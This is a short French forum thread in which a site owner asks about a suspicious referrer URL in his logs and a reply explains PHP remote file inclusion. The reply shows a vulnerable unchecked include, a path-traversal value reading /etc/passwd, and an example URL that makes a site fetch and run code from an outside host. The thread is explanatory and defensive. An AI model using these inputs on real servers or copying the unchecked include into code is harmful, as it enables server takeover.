Twitter iPhone pliant OnePlus 11 PS5 Disney+ Orange Livebox Windows 11

geocities.com base d'attaque

1 réponse
Avatar
Pierre
J'ai trouvé une page référente dans mes log
http://www.geocities.com/r00t_exploit/cmd.txt qui permet a priori d'agir sur
le contenu d'un site en passant des commandes en parametre.

Si quelqu'un en sait davantage sur ce sujet, merci de répondre dans le GN

Merci d'avance

1 réponse

Avatar
Xavier Roche
Pierre wrote:
J'ai trouvé une page référente dans mes log
http://www.geocities.com/r00t_exploit/cmd.txt qui permet a priori d'agir sur
le contenu d'un site en passant des commandes en parametre.
Si quelqu'un en sait davantage sur ce sujet, merci de répondre dans le GN


En gros, cela permet d'exploiter les failles d'inclusion dûes à des
scripts mal protégés.

Exemple:
http://www.example.com/page.php?page=sommaire

avec page.php:
<?php
@include($page.".php"); // variable exterieure non vérifiée!
..
?>

Ici premier problème: la variable "page" peut être arbitrairement écrite
par l'utilisateur ; comme par exemple page=../../../../etc/passwd

Le problème additionnel c'est que les opérations comme fopen(),
include() etc. sont en PHP par défaut compatibles avec autre chose que
de la filesystem, et notamment permettent d'utiliser des protocoles
comme HTTP.

Ainsi, en utilisant:
http://www.example.com/page.php?page=http://www.geocities.com/r00t_exploit/cmd.txt
on peut inclure le fichier hébergé sur le site en question.

Le problème, c'est que là on effectue une inclusion de *code*, et plus
simplement d'une page HTML: on peut donc arbitrairement injecter du code
PHP sur un serveur.

En sachant que PHP peut (s'il n'est pas placé en mode "safe") executer
lui même des process sur la machine, comme un inetd(), on peut alors
assez facilement entrer en mode user sur le serveur, et par la suite
escalader en root, ou héberger un compte ftp pirate, envoyer du spam etc.